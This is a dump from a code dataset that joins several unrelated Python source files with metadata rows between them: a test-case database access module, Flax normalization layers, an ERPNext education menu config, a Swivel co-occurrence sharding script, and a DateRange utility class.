raise Exception("获取用例列表失败")
@staticmethod
def select_constructor(case_id: int):
"""
Fetch the constructor data of a test case by case_id
:param case_id:
:return:
"""
try:
with Session() as session:
data = session.query(Constructor).filter_by(case_id=case_id, deleted_at=0).order_by(
desc(Constructor.created_at)).all()
return data
except Exception as e:
TestCaseDao.log.error(f"查询构造数据失败: {str(e)}")
@staticmethod
async def async_select_constructor(case_id: int) -> List[Constructor]:
"""
        Asynchronously fetch the constructor data of a test case
:param case_id:
:return:
"""
try:
async with async_session() as session:
sql = select(Constructor).where(Constructor.case_id == case_id,
Constructor.deleted_at == 0).order_by(Constructor.created_at)
data = await session.execute(sql)
return data.scalars().all()
except Exception as e:
TestCaseDao.log.error(f"查询构造数据失败: {str(e)}")
@staticmethod
async def collect_data(case_id: int, data: List):
"""
        Collect the data that uses case_id as a precondition (postconditions are not fully supported yet)
:param data:
:param case_id:
:return:
"""
        # First fetch the data constructors (preconditions)
pre = dict(id=f"pre_{case_id}", label="前置条件", children=list())
suffix = dict(id=f"suffix_{case_id}", label="后置条件", children=list())
await TestCaseDao.collect_constructor(case_id, pre, suffix)
data.append(pre)
        # Fetch the assertions
asserts = dict(id=f"asserts_{case_id}", label="断言", children=list())
await TestCaseDao.collect_asserts(case_id, asserts)
data.append(asserts)
data.append(suffix)
@staticmethod
async def collect_constructor(case_id, parent, suffix):
constructors = await TestCaseDao.async_select_constructor(case_id)
for c in constructors:
temp = dict(id=f"constructor_{c.id}", label=f"{c.name}", children=list())
if c.type == Config.ConstructorType.testcase:
                # The constructor is itself a test case, recurse into it
temp["label"] = "[CASE]: " + temp["label"]
json_data = json.loads(c.constructor_json)
await TestCaseDao.collect_data(json_data.get("case_id"), temp.get("children"))
elif c.type == Config.ConstructorType.sql:
temp["label"] = "[SQL]: " + temp["label"]
elif c.type == Config.ConstructorType.redis:
temp["label"] = "[REDIS]: " + temp["label"]
elif c.type == Config.ConstructorType.py_script:
temp["label"] = "[PyScript]: " + temp["label"]
            # Otherwise append the data as-is
if c.suffix:
suffix.get("children").append(temp)
else:
parent.get("children").append(temp)
@staticmethod
async def collect_asserts(case_id, parent):
asserts, err = await TestCaseAssertsDao.async_list_test_case_asserts(case_id)
if err:
raise Exception("获取断言数据失败")
for a in asserts:
temp = dict(id=f"assert_{a.id}", label=f"{a.name}", children=list())
parent.get("children").append(temp)
@staticmethod
async def get_xmind_data(case_id: int):
# result = dict()
data = await TestCaseDao.query_test_case(case_id)
cs = data.get("case")
        # Start parsing the test data
result = dict(id=f"case_{case_id}", label=f"{cs.name}({cs.id})")
children = list()
await TestCaseDao.collect_data(case_id, children)
result["children"] = children
return result
@staticmethod
@RedisHelper.cache("rank")
async def query_user_case_list() -> Dict[str, List]:
"""
created by woody at 2022-02-13 12:59
        Query each user's test case count and rank
:return:
"""
ans = dict()
async with async_session() as session:
async with session.begin():
sql = select(TestCase.create_user, func.count(TestCase.id)) \
.outerjoin(User, and_(User.deleted_at == 0, TestCase.create_user == User.id)).where(
TestCase.deleted_at == 0).group_by(TestCase.create_user).order_by(
desc(func.count(TestCase.id)))
query = await session.execute(sql)
for i, q in enumerate(query.all()):
user, count = q
ans[str(user)] = [count, i + 1]
return ans
@staticmethod
async def query_weekly_user_case(user_id: int, start_time: datetime, end_time: datetime) -> List:
ans = dict()
async with async_session() as session:
async with session.begin():
date_ = func.date_format(TestCase.created_at, "%Y-%m-%d")
sql = select(date_, func.count(TestCase.id)).where(
TestCase.create_user == user_id,
TestCase.deleted_at == 0, TestCase.created_at.between(start_time, end_time)).group_by(
date_).order_by(asc(date_))
query = await session.execute(sql)
for i, q in enumerate(query.all()):
date, count = q
ans[date] = count
return await TestCaseDao.fill_data(start_time, end_time, ans)
@staticmethod
async def fill_data(start_time: datetime, end_time: datetime, data: dict):
"""
        Fill in the missing dates with zero counts
:param data:
:param start_time:
:param end_time:
:return:
"""
start = start_time
ans = []
while start <= end_time:
date = start.strftime("%Y-%m-%d")
ans.append(dict(date=date, count=data.get(date, 0)))
start += timedelta(days=1)
return ans
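# A minimal sketch of what fill_data produces, assuming only the standard library:
# one entry per calendar day in [start_time, end_time], with days missing from the
# input dict padded with a zero count. The dates and counts below are arbitrary examples.
def _fill_data_sketch():
    import asyncio
    from datetime import datetime
    start, end = datetime(2022, 2, 13), datetime(2022, 2, 15)
    counts = {"2022-02-14": 3}
    # Expected result:
    # [{'date': '2022-02-13', 'count': 0},
    #  {'date': '2022-02-14', 'count': 3},
    #  {'date': '2022-02-15', 'count': 0}]
    return asyncio.run(TestCaseDao.fill_data(start, end, counts))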
| 40.405479
| 119
| 0.558991
|
e0b068616ca9c184341effbd6d2b8d92adf8556c
| 10,687
|
py
|
Python
|
flax/linen/normalization.py
|
joelgarde/flax
|
7d12d20f8272ce9c639711e92db89fdaf7f1a94a
|
[
"Apache-2.0"
] | null | null | null |
flax/linen/normalization.py
|
joelgarde/flax
|
7d12d20f8272ce9c639711e92db89fdaf7f1a94a
|
[
"Apache-2.0"
] | null | null | null |
flax/linen/normalization.py
|
joelgarde/flax
|
7d12d20f8272ce9c639711e92db89fdaf7f1a94a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Normalization modules for Flax."""
from typing import (Any, Callable, Optional, Tuple)
from jax import lax
from jax.nn import initializers
import jax.numpy as jnp
from flax.linen.module import Module, compact, merge_param
PRNGKey = Any
Array = Any
Shape = Tuple[int]
Dtype = Any # this could be a real type?
_no_init = lambda rng, shape: ()
def _absolute_dims(rank, dims):
return tuple([rank + dim if dim < 0 else dim for dim in dims])
class BatchNorm(Module):
"""BatchNorm Module.
Attributes:
use_running_average: if True, the statistics stored in batch_stats
will be used instead of computing the batch statistics on the input.
axis: the feature or non-batch axis of the input.
momentum: decay rate for the exponential moving average of
the batch statistics.
epsilon: a small float added to variance to avoid dividing by zero.
dtype: the dtype of the computation (default: float32).
use_bias: if True, bias (beta) is added.
use_scale: if True, multiply by scale (gamma).
When the next layer is linear (also e.g. nn.relu), this can be disabled
since the scaling will be done by the next layer.
bias_init: initializer for bias, by default, zero.
scale_init: initializer for scale, by default, one.
axis_name: the axis name used to combine batch statistics from multiple
devices. See `jax.pmap` for a description of axis names (default: None).
axis_index_groups: groups of axis indices within that named axis
representing subsets of devices to reduce over (default: None). For
example, `[[0, 1], [2, 3]]` would independently batch-normalize over
the examples on the first two and last two devices. See `jax.lax.psum`
for more details.
"""
use_running_average: Optional[bool] = None
axis: int = -1
momentum: float = 0.99
epsilon: float = 1e-5
dtype: Dtype = jnp.float32
use_bias: bool = True
use_scale: bool = True
bias_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.zeros
scale_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.ones
axis_name: Optional[str] = None
axis_index_groups: Any = None
@compact
def __call__(self, x, use_running_average: Optional[bool] = None):
"""Normalizes the input using batch statistics.
Args:
x: the input to be normalized.
use_running_average: if true, the statistics stored in batch_stats
will be used instead of computing the batch statistics on the input.
Returns:
Normalized inputs (the same shape as inputs).
"""
use_running_average = merge_param(
'use_running_average', self.use_running_average, use_running_average)
x = jnp.asarray(x, jnp.float32)
axis = self.axis if isinstance(self.axis, tuple) else (self.axis,)
axis = _absolute_dims(x.ndim, axis)
feature_shape = tuple(d if i in axis else 1 for i, d in enumerate(x.shape))
reduced_feature_shape = tuple(d for i, d in enumerate(x.shape) if i in axis)
reduction_axis = tuple(i for i in range(x.ndim) if i not in axis)
# we detect if we're in initialization via empty variable tree.
initializing = not self.has_variable('batch_stats', 'mean')
ra_mean = self.variable('batch_stats', 'mean',
lambda s: jnp.zeros(s, jnp.float32),
reduced_feature_shape)
ra_var = self.variable('batch_stats', 'var',
lambda s: jnp.ones(s, jnp.float32),
reduced_feature_shape)
if use_running_average:
mean, var = ra_mean.value, ra_var.value
else:
mean = jnp.mean(x, axis=reduction_axis, keepdims=False)
mean2 = jnp.mean(lax.square(x), axis=reduction_axis, keepdims=False)
if self.axis_name is not None and not initializing:
concatenated_mean = jnp.concatenate([mean, mean2])
mean, mean2 = jnp.split(
lax.pmean(
concatenated_mean,
axis_name=self.axis_name,
axis_index_groups=self.axis_index_groups), 2)
var = mean2 - lax.square(mean)
if not initializing:
ra_mean.value = self.momentum * ra_mean.value + (1 - self.momentum) * mean
ra_var.value = self.momentum * ra_var.value + (1 - self.momentum) * var
y = x - mean.reshape(feature_shape)
mul = lax.rsqrt(var + self.epsilon)
if self.use_scale:
scale = self.param('scale',
self.scale_init,
reduced_feature_shape).reshape(feature_shape)
mul = mul * scale
y = y * mul
if self.use_bias:
bias = self.param('bias',
self.bias_init,
reduced_feature_shape).reshape(feature_shape)
y = y + bias
return jnp.asarray(y, self.dtype)
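# A minimal usage sketch for BatchNorm (assumes flax.linen is importable as `nn`; the
# MLP module and layer sizes are illustrative, not part of this file's API): during
# training the module is applied with mutable=['batch_stats'] so the running statistics
# are updated, and at evaluation time use_running_average=True reuses the stored values.
def _batch_norm_usage_sketch():
  import jax
  import jax.numpy as jnp
  import flax.linen as nn
  class MLP(nn.Module):
    @nn.compact
    def __call__(self, x, train: bool):
      x = nn.Dense(features=8)(x)
      x = nn.BatchNorm(use_running_average=not train)(x)
      return nn.relu(x)
  model = MLP()
  x = jnp.ones((4, 3))
  variables = model.init(jax.random.PRNGKey(0), x, train=True)
  # Training step: the updated running statistics come back as mutated state.
  y, new_state = model.apply(variables, x, train=True, mutable=['batch_stats'])
  # Evaluation: reuse the stored statistics; nothing is mutated.
  y_eval = model.apply({**variables, **new_state}, x, train=False)
  return y, y_eval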
class LayerNorm(Module):
"""Layer normalization (https://arxiv.org/abs/1607.06450).
Operates on the last axis of the input data.
It normalizes the activations of the layer for each given example in a
batch independently, rather than across a batch like Batch Normalization.
i.e. applies a transformation that maintains the mean activation within
each example close to 0 and the activation standard deviation close to 1.
Attributes:
epsilon: A small float added to variance to avoid dividing by zero.
dtype: the dtype of the computation (default: float32).
use_bias: If True, bias (beta) is added.
use_scale: If True, multiply by scale (gamma). When the next layer is linear
(also e.g. nn.relu), this can be disabled since the scaling will be done
by the next layer.
bias_init: Initializer for bias, by default, zero.
scale_init: Initializer for scale, by default, one.
"""
epsilon: float = 1e-6
dtype: Any = jnp.float32
use_bias: bool = True
use_scale: bool = True
bias_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.zeros
scale_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.ones
@compact
def __call__(self, x):
"""Applies layer normalization on the input.
Args:
x: the inputs
Returns:
Normalized inputs (the same shape as inputs).
"""
x = jnp.asarray(x, jnp.float32)
features = x.shape[-1]
mean = jnp.mean(x, axis=-1, keepdims=True)
mean2 = jnp.mean(lax.square(x), axis=-1, keepdims=True)
var = mean2 - lax.square(mean)
mul = lax.rsqrt(var + self.epsilon)
if self.use_scale:
mul = mul * jnp.asarray(
self.param('scale', self.scale_init, (features,)),
self.dtype)
y = (x - mean) * mul
if self.use_bias:
y = y + jnp.asarray(
self.param('bias', self.bias_init, (features,)),
self.dtype)
return jnp.asarray(y, self.dtype)
class GroupNorm(Module):
"""Group normalization (arxiv.org/abs/1803.08494).
This op is similar to batch normalization, but statistics are shared across
equally-sized groups of channels and not shared across batch dimension.
Thus, group normalization does not depend on the batch composition and does
not require maintaining internal state for storing statistics.
The user should either specify the total number of channel groups or the
number of channels per group.
Attributes:
num_groups: the total number of channel groups. The default value of 32 is
proposed by the original group normalization paper.
group_size: the number of channels in a group.
epsilon: A small float added to variance to avoid dividing by zero.
dtype: the dtype of the computation (default: float32).
use_bias: If True, bias (beta) is added.
use_scale: If True, multiply by scale (gamma). When the next layer is linear
(also e.g. nn.relu), this can be disabled since the scaling will be done
by the next layer.
bias_init: Initializer for bias, by default, zero.
scale_init: Initializer for scale, by default, one.
"""
num_groups: int = 32
group_size: Optional[int] = None
epsilon: float = 1e-6
dtype: Any = jnp.float32
use_bias: bool = True
use_scale: bool = True
bias_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.zeros
scale_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.ones
@compact
def __call__(self, x):
"""Applies group normalization to the input (arxiv.org/abs/1803.08494).
Args:
x: the input of shape N...C, where N is a batch dimension and C is a
      channel dimension. `...` represents an arbitrary number of extra
dimensions that are used to accumulate statistics over.
Returns:
Normalized inputs (the same shape as inputs).
"""
x = jnp.asarray(x, jnp.float32)
if ((self.num_groups is None and self.group_size is None) or
(self.num_groups is not None and self.group_size is not None)):
raise ValueError('Either `num_groups` or `group_size` should be '
'specified, but not both of them.')
num_groups = self.num_groups
if self.group_size is not None:
channels = x.shape[-1]
if channels % self.group_size != 0:
raise ValueError('Number of channels ({}) is not multiple of the '
'group size ({}).'.format(channels, self.group_size))
num_groups = channels // self.group_size
input_shape = x.shape
group_shape = x.shape[:-1] + (num_groups, x.shape[-1] // num_groups)
x = x.reshape(group_shape)
reduction_axis = [d for d in range(1, x.ndim - 2)] + [x.ndim - 1]
mean = jnp.mean(x, axis=reduction_axis, keepdims=True)
mean_of_squares = jnp.mean(jnp.square(x), axis=reduction_axis,
keepdims=True)
var = mean_of_squares - jnp.square(mean)
x = (x - mean) * lax.rsqrt(var + self.epsilon)
x = x.reshape(input_shape)
feature_shape = tuple([1 for d in input_shape[:-1]] + [input_shape[-1]])
if self.use_scale:
x = x * self.param('scale', self.scale_init, feature_shape)
if self.use_bias:
x = x + self.param('bias', self.bias_init, feature_shape)
return x.astype(self.dtype)
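# A minimal sketch for the stateless normalizers (assumes flax.linen is importable as
# `nn`; shapes and RNG seeds are illustrative): LayerNorm and GroupNorm keep no running
# statistics, so init/apply need no mutable collections. GroupNorm needs the channel
# count to be divisible by num_groups (or pass group_size instead).
def _layer_and_group_norm_sketch():
  import jax
  import jax.numpy as jnp
  import flax.linen as nn
  x = jnp.ones((2, 16))                  # (batch, features)
  ln = nn.LayerNorm()
  y_ln = ln.apply(ln.init(jax.random.PRNGKey(0), x), x)
  gn = nn.GroupNorm(num_groups=4)        # 16 channels split into 4 groups of 4
  y_gn = gn.apply(gn.init(jax.random.PRNGKey(1), x), x)
  return y_ln, y_gn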
| 39.435424
| 82
| 0.671657
|
5a05a258b21d18a0d3cef79cb27d9edadd65fb42
| 4,334
|
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/config/education.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/config/education.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/config/education.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from frappe import _
def get_data():
return [
{
"label": _("Student"),
"items": [
{
"type": "doctype",
"name": "Student"
},
{
"type": "doctype",
"name": "Guardian"
},
{
"type": "doctype",
"name": "Student Log"
},
{
"type": "doctype",
"name": "Student Group"
}
]
},
{
"label": _("Admission"),
"items": [
{
"type": "doctype",
"name": "Student Applicant"
},
{
"type": "doctype",
"name": "Student Admission"
},
{
"type": "doctype",
"name": "Program Enrollment"
}
]
},
{
"label": _("Attendance"),
"items": [
{
"type": "doctype",
"name": "Student Attendance"
},
{
"type": "doctype",
"name": "Student Leave Application"
},
{
"type": "report",
"is_query_report": True,
"name": "Absent Student Report",
"doctype": "Student Attendance"
},
{
"type": "report",
"is_query_report": True,
"name": "Student Batch-Wise Attendance",
"doctype": "Student Attendance"
},
]
},
{
"label": _("Tools"),
"items": [
{
"type": "doctype",
"name": "Student Attendance Tool"
},
{
"type": "doctype",
"name": "Assessment Result Tool"
},
{
"type": "doctype",
"name": "Student Group Creation Tool"
},
{
"type": "doctype",
"name": "Program Enrollment Tool"
},
{
"type": "doctype",
"name": "Course Scheduling Tool"
}
]
},
{
"label": _("Assessment"),
"items": [
{
"type": "doctype",
"name": "Assessment Plan"
},
{
"type": "doctype",
"name": "Assessment Group",
"link": "Tree/Assessment Group",
},
{
"type": "doctype",
"name": "Assessment Result"
},
{
"type": "doctype",
"name": "Assessment Criteria"
}
]
},
{
"label": _("Assessment Reports"),
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Course wise Assessment Report",
"doctype": "Assessment Result"
},
{
"type": "report",
"is_query_report": True,
"name": "Final Assessment Grades",
"doctype": "Assessment Result"
},
{
"type": "report",
"is_query_report": True,
"name": "Assessment Plan Status",
"doctype": "Assessment Plan"
},
{
"type": "doctype",
"name": "Student Report Generation Tool"
}
]
},
{
"label": _("Fees"),
"items": [
{
"type": "doctype",
"name": "Fees"
},
{
"type": "doctype",
"name": "Fee Schedule"
},
{
"type": "doctype",
"name": "Fee Structure"
},
{
"type": "doctype",
"name": "Fee Category"
}
]
},
{
"label": _("Schedule"),
"items": [
{
"type": "doctype",
"name": "Course Schedule",
"route": "List/Course Schedule/Calendar"
},
{
"type": "doctype",
"name": "Course Scheduling Tool"
}
]
},
{
"label": _("Masters"),
"items": [
{
"type": "doctype",
"name": "Course"
},
{
"type": "doctype",
"name": "Program"
},
{
"type": "doctype",
"name": "Instructor"
},
{
"type": "doctype",
"name": "Room"
}
]
},
{
"label": _("Setup"),
"items": [
{
"type": "doctype",
"name": "Student Category"
},
{
"type": "doctype",
"name": "Student Batch Name"
},
{
"type": "doctype",
"name": "Grading Scale"
},
{
"type": "doctype",
"name": "Academic Term"
},
{
"type": "doctype",
"name": "Academic Year"
},
{
"type": "doctype",
"name": "Education Settings"
}
]
},
{
"label": _("Other Reports"),
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Student and Guardian Contact Details",
"doctype": "Program Enrollment"
},
{
"type": "report",
"is_query_report": True,
"name": "Student Monthly Attendance Sheet",
"doctype": "Student Attendance"
},
{
"type": "report",
"name": "Student Fee Collection",
"doctype": "Fees",
"is_query_report": True
}
]
}
]
| 17.130435
| 52
| 0.461467
|
1a24d48adcbdb427d7f7f17b52046e706d6c7775
| 5,881
|
py
|
Python
|
swivel/glove_to_shards.py
|
robrkerr/tensorflow-models
|
3656a07e89be134c2bc333c60a6c709e475024a6
|
[
"Apache-2.0"
] | 308
|
2018-09-06T18:46:57.000Z
|
2022-03-28T08:22:45.000Z
|
swivel/glove_to_shards.py
|
robrkerr/tensorflow-models
|
3656a07e89be134c2bc333c60a6c709e475024a6
|
[
"Apache-2.0"
] | 64
|
2018-06-20T10:14:17.000Z
|
2021-09-08T05:58:25.000Z
|
swivel/glove_to_shards.py
|
robrkerr/tensorflow-models
|
3656a07e89be134c2bc333c60a6c709e475024a6
|
[
"Apache-2.0"
] | 69
|
2018-09-18T12:06:56.000Z
|
2022-03-14T11:49:16.000Z
|
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts a Glove binary co-occurrence matrix into Swivel shards.
Usage:
glove_to_shards.py --input <coocs> --vocab <vocab> --output_dir <output_dir>
Options
--input <coocs>
The Glove co-occurrence file.
--vocab <vocab>
Path to the vocabulary text file, one token per line.
--output_dir <directory>
    Specifies the output directory where the various Swivel data
    files should be placed.
--shard_size <int>
Specifies the shard size; default 4096.
"""
from __future__ import print_function
import itertools
import os
import struct
import sys
import tensorflow as tf
flags = tf.app.flags
flags.DEFINE_string('input', 'coocurrences.bin', 'Vocabulary file')
flags.DEFINE_string('vocab', 'vocab.txt', 'Vocabulary file')
flags.DEFINE_string('output_dir', '/tmp/swivel_data', 'Output directory')
flags.DEFINE_integer('shard_size', 4096, 'Shard size')
FLAGS = tf.app.flags.FLAGS
glove_cooc_fmt = struct.Struct('iid')
shard_cooc_fmt = struct.Struct('if')
def make_shard_files(coocs, nshards, vocab_sz):
"""Chops the binary Glove co-occurrence matrix into shards.
This reads the Glove binary co-occurrence file and assigns individual
co-occurrence counts to the appropriate Swivel shard.
Args:
    coocs: the co-occurrence file to read
nshards: the number of shards along one dimension of the square matrix
vocab_sz: the vocabulary size
Returns:
A (shard_table, marginals) tuple. The shard_table maps the row and column
shard ID to a file handle containing the co-occurrences for that shard; the
marginals contain the marginal sums.
"""
row_sums = [0] * vocab_sz
col_sums = [0] * vocab_sz
coocs.seek(0, os.SEEK_END)
ncoocs = coocs.tell() / glove_cooc_fmt.size
coocs.seek(0, os.SEEK_SET)
shard_files = {}
for row in range(nshards):
for col in range(nshards):
filename = os.path.join(
FLAGS.output_dir, 'shard-%03d-%03d.bin' % (row, col))
shard_files[(row, col)] = open(filename, 'w+')
for ix in xrange(ncoocs):
if ix % 1000000 == 0:
sys.stdout.write('\rsharding co-occurrences: %0.1f%% (%d/%d)' % (
100.0 * ix / ncoocs, ix, ncoocs))
sys.stdout.flush()
bits = coocs.read(glove_cooc_fmt.size)
if not bits:
break
# Glove has 1-indexed IDs.
row_id, col_id, cnt = glove_cooc_fmt.unpack(bits)
if row_id > vocab_sz or col_id > vocab_sz:
continue
row_id -= 1
row_shard = row_id % nshards
row_off = row_id / nshards
col_id -= 1
col_shard = col_id % nshards
col_off = col_id / nshards
shard_pos = row_off * FLAGS.shard_size + col_off # row major
shard_files[(row_shard, col_shard)].write(
shard_cooc_fmt.pack(shard_pos, cnt))
# Accumulate marginals.
row_sums[row_id] += cnt
col_sums[col_id] += cnt
sys.stdout.write('\n')
if any(abs(r - c) > 0.1 for r, c in itertools.izip(row_sums, col_sums)):
print('WARNING! Row and column marginals differ; is your matrix symmetric?',
file=sys.stderr)
return (shard_files, row_sums)
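# A small sketch (not part of the original script) of how a single 0-indexed
# (row_id, col_id) co-occurrence is routed to a shard and to a row-major offset
# inside it, mirroring the arithmetic in make_shard_files above; the argument
# defaults are arbitrary example values.
def _shard_coords_sketch(row_id=5, col_id=9, nshards=4, shard_size=4096):
  row_shard, row_off = row_id % nshards, row_id // nshards
  col_shard, col_off = col_id % nshards, col_id // nshards
  shard_pos = row_off * shard_size + col_off
  return (row_shard, col_shard), shard_pos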
def main(_):
with open(FLAGS.vocab, 'r') as lines:
orig_vocab_sz = sum(1 for _ in lines)
shard_sz = FLAGS.shard_size
vocab_sz = orig_vocab_sz - orig_vocab_sz % shard_sz
nshards = vocab_sz / shard_sz
print('vocab size is %d (originally %d), %d %dx%d-element shards' % (
vocab_sz, orig_vocab_sz, nshards * nshards, shard_sz, shard_sz))
# Create the output directory, if necessary
if FLAGS.output_dir and not os.path.isdir(FLAGS.output_dir):
os.makedirs(FLAGS.output_dir)
with open(FLAGS.input, 'r') as coocs:
shard_files, marginals = make_shard_files(coocs, nshards, vocab_sz)
# Now sort the shards and write the TFRecords.
filename = os.path.join(FLAGS.output_dir, 'shards.recs')
with tf.python_io.TFRecordWriter(filename) as writer:
ix = 0
for (row, col), fh in shard_files.iteritems():
ix += 1
sys.stdout.write('\rwriting shard %d/%d' % (ix, len(shard_files)))
sys.stdout.flush()
fh.seek(0)
buf = fh.read()
os.unlink(fh.name)
fh.close()
coocs = [
shard_cooc_fmt.unpack_from(buf, off)
for off in range(0, len(buf), shard_cooc_fmt.size)]
# N.B. we assume that there aren't any duplicates here!
coocs.sort(key=lambda kv: kv[0])
def _int64s(xs):
return tf.train.Feature(int64_list=tf.train.Int64List(value=list(xs)))
def _floats(xs):
return tf.train.Feature(float_list=tf.train.FloatList(value=list(xs)))
example = tf.train.Example(features=tf.train.Features(feature={
'global_row': _int64s(row + nshards * i for i in range(shard_sz)),
'global_col': _int64s(col + nshards * i for i in range(shard_sz)),
'sparse_local_row': _int64s(pos / shard_sz for pos, _ in coocs),
'sparse_local_col': _int64s(pos % shard_sz for pos, _ in coocs),
'sparse_value': _floats(cnt for _, cnt in coocs)}))
writer.write(example.SerializeToString())
print('\nwriting marginals...')
with open(os.path.join(FLAGS.output_dir, 'marginals.txt'), 'w') as fh:
for cnt in marginals:
fh.write('%0.1f\n' % cnt)
print('done!')
if __name__ == '__main__':
tf.app.run()
| 29.70202
| 80
| 0.679986
|
f45e80ca902986b8ba39279d9d9ce7dc67dcd93d
| 17,168
|
py
|
Python
|
daterange.py
|
Derek-Strasters/daterange
|
999450a7e3351d67d1cd3726b4d07bc097e7f0aa
|
[
"MIT"
] | 1
|
2021-10-11T05:58:09.000Z
|
2021-10-11T05:58:09.000Z
|
daterange.py
|
Derek-Strasters/daterange
|
999450a7e3351d67d1cd3726b4d07bc097e7f0aa
|
[
"MIT"
] | null | null | null |
daterange.py
|
Derek-Strasters/daterange
|
999450a7e3351d67d1cd3726b4d07bc097e7f0aa
|
[
"MIT"
] | null | null | null |
from datetime import timedelta, date
from typing import Optional, Union, List
_DAY = timedelta(days=1)
def type_check(func):
def wrapper(*args, **kwargs):
if not isinstance(args[1], DateRange):
if isinstance(args[1], date):
day_range = DateRange(args[1], args[1])
args = (args[0], day_range, *args[2:]) if len(args) > 2 else (args[0], day_range)
else:
def not_implemented():
return NotImplemented
return not_implemented()
return func(*args, **kwargs)
return wrapper
class DateRange:
"""
Contains a range of dates that are not necessarily contiguous.
Intervals can be constructed with dates and added with the familiar
numerical operators.
Adding:
>>> my_range = DateRange(date(2021, 8, 1), date(2021, 8, 31)) # All of Aug
>>> my_range += DateRange(date(2021, 10, 1), date(2021, 10, 31)) # All of Aug and Oct
>>> print(my_range)
from 2021-08-01 to 2021-08-31 and
from 2021-10-01 to 2021-10-31
>>> august = DateRange(date(2021, 8, 1), date(2021, 8, 31))
>>> september = DateRange(date(2021, 9, 1), date(2021, 9, 30))
>>> july = DateRange(date(2021, 7, 1), date(2021, 7, 31))
>>> august + september + july == DateRange(date(2021, 7, 1), date(2021, 9, 30))
True
datetime.date object can be checked if it falls within a DateRange:
>>> date(2021, 8, 17) in august # Is Aug 17th in the range?
True
>>> date(2021, 9, 10) in august # Is Sep 10th in the range?
False
This works with DateRanges as well:
>>> august in DateRange(date(2021, 7, 1), date(2021, 9, 30))
True
DateRanges can also be intersected with and subtracted from one another:
>>> jul_2_sep = august + september + july
>>> print(jul_2_sep - august)
from 2021-07-01 to 2021-07-31 and
from 2021-09-01 to 2021-09-30
>>> jul_2_aug = july + august
>>> aug_2_sep = august + september
>>> print(jul_2_aug & aug_2_sep)
from 2021-08-01 to 2021-08-31
Taking inspiration from the way we refer to dates with language, DateRanges
are treated inclusively as this is the most idiomatic approach.
For example when we say "for the month of August" we mean every day
within the month, or when we say "Monday through Friday" we mean the
entirety of each day and not just the delta time.
For example:
>>> date(2021, 8, 31) in august
True
>>> date(2021, 8, 1) in august
True
>>> DateRange(date(2021, 8, 1), date(2021, 8, 31)).days
31
    If the start day is None, the range extends back to the beginning of time
    (date.min); if the end day is None, it extends forward to the end of time
    (date.max).
    If the start day is after the end day, the range includes all time except
    the days strictly between the end date and the start date.
If the start day is exactly one day after the end day the range will be all
time.
"""
__slots__ = '_intervals'
class Interval:
__slots__ = 'start', 'end'
max = date.max
min = date.min
def __init__(self,
start: Optional[date] = None,
end: Optional[date] = None):
self.start = start if start else self.min
self.end = end if end else self.max
if self.start > self.end:
raise ValueError(f"End cannot be before start: {start} > {end}")
def __contains__(self, other: Union[date, 'DateRange.Interval']):
"""If a date or DateRange is entirely within this DateRange (Inclusive of end date)"""
if isinstance(other, date):
return self.date_in(other)
return self.start <= other.start and self.end >= other.end
def date_in(self, _date: date):
return self.end >= _date >= self.start
def __eq__(self, other):
return self.start == other.start and self.end == other.end
def __lt__(self, other: Union['DateRange.Interval', date]):
"""If this DateRange is entirely before another DateRange"""
return self.end < other.start if isinstance(other, type(self)) else self.end < other
def __gt__(self, other: Union['DateRange.Interval', date]):
"""If this DateRange is entirely after another DateRange"""
return self.start > other.end if isinstance(other, type(self)) else self.start > other
def __and__(self, other: 'DateRange.Interval') -> Union[None, 'DateRange.Interval']:
"""Intersection"""
start = self.start if self.start >= other.start else other.start
end = self.end if self.end <= other.end else other.end
return type(self)(start, end) if start <= end else None
def __sub__(self, other: 'DateRange.Interval') -> List['DateRange.Interval']:
"""Remove dates where another Interval intersects this one. Returns a list of Intervals"""
if self.start < other.start:
if self.end >= other.start:
if self.end > other.end:
return [type(self)(self.start, other.start - _DAY),
type(self)(other.end + _DAY, self.end)] # (..[::]..)
return [type(self)(self.start, other.start - _DAY), ] # (...[:::]) (..[::)..]
return [self.copy(), ] # (..) [..]
if self.start > other.end:
return [self.copy(), ] # [..] (..)
if self.end > other.end:
return [type(self)(other.end + _DAY, self.end), ] # [..(::]..) ([:::]...)
return [] # [(::::::)] [..(::)..] [(:::)...] [...(:::)]
def __repr__(self):
return f"Interval({self.start}, {self.end})"
__str__ = __repr__
def intersects(self, other: 'DateRange.Interval') -> bool:
return self.end >= other.start and self.start <= other.end
def not_intersects(self, other: 'DateRange.Interval') -> bool:
return self.end < other.start or self.start > other.end
def r_butted(self, other: 'DateRange.Interval') -> bool:
"""Is the end of this date interval butted against another interval?"""
return other.start - self.end == _DAY
def l_butted(self, other: 'DateRange.Interval') -> bool:
"""Is the start of this date interval butted against another interval?"""
return self.start - other.end == _DAY
